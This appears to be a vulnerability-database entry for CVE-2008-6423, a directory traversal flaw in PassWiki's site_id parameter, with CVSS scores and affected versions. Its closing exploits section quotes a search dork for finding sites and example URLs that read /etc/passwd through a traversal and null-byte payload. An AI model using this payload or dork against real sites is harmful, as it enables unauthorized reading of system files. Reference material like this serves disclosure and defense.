5
CVSSv2

CVE-2008-6423

Published: 06/03/2009 Updated: 29/09/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

Directory traversal vulnerability in passwiki.php in PassWiki 0.9.16 RC3 and previous versions allows remote malicious users to read arbitrary local files via a .. (dot dot) in the site_id parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

i-apps passwiki 0.9.16

i-apps passwiki 0.9.14

i-apps passwiki 0.9.13

i-apps passwiki 0.9.6

i-apps passwiki 0.9.5

i-apps passwiki 0.9.15

i-apps passwiki 0.9.10

i-apps passwiki 0.9.9

i-apps passwiki 0.9.12

i-apps passwiki 0.9.11

i-apps passwiki 0.9.3

i-apps passwiki

i-apps passwiki 0.9.8

i-apps passwiki 0.9.7

Exploits

dork: "powered by PassWiki" example: w3funsrvcom/~konjo/passwiki/passwikiphp?site_id=/////////////etc/passwd%00 inajobno-iporg/passwiki/passwikiphp?site_id=/////////////etc/passwd%00 author:mozi2weed@yahoocom rstzoneorg # milw0rmcom [2008-05-31] ...